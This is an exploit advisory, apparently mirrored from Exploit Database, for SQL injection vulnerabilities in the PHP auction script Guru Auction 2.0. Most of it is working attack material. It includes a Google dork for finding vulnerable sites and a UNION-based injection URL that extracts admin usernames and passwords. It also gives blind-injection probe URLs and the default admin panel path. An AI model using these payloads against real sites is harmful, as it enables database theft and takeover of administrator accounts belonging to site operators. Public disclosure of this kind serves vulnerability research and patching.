Guru Auction 2.0 – Multiple SQL Injections

• Exploit Database
• 8 阅读

• 作者： v3n0m
  日期： 2012-12-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/23673/

•  ) )) ( ( ( (( ) ) 
  ( /(( /( ( ( /(( (( )\ ))\ ))\ ))\ ) )\ ) ( /(( /( 
  )\())\()))\ ))\()) )\)\ )\ (()/(()/(((()/(()/((()/( )\()) )\())
   ((_)((_)\(()/( ((_)((((_)((((_)(((_)(/(_))(_)) )\/(_))(_))/(_))(_)\|((_)\ 
  __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))_((_)_ ((_)
  \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ ||_ _|| \| | |/ / 
   \ V / (_) || (_ |\ V / / _ \| (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
  |_| \___/\___| |_| /_/ \_\\___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
  										.WEB.ID
  -----------------------------------------------------------------------
  Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
  -----------------------------------------------------------------------
  Author	: v3n0m
  Site	: http://ycl.sch.id/
  Date		: December, 26-2012
  Location	: Yogyakarta, Indonesia
  Time Zone	: GMT +7:00
  
  Application	: Guru Auction 2.0
  Price		: $49
  Vendor	: http://www.guruscript.com/
  Google Dork	: inurl:subcat.php?cate_id=
  -----------------------------------------------------------------------
  
  SQLi p0c:
  ~~~~~~~~~~
  http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
  
  
  Blind SQLi p0c:
  ~~~~~~~~~~
  http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
  http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
  
  
  Default Admin Page:
  ~~~~~~~~~~
  http://domain.tld/[path]/admin/
  
  -----------------------------------------------------------------------
  
  Thanks:
  
  LeQhi, lingah, Ozie, m4rc0, g0nz, L1ntang, GheMaX, chainloader, SakitJiwa, Susant, dextone, drubicza, f4c0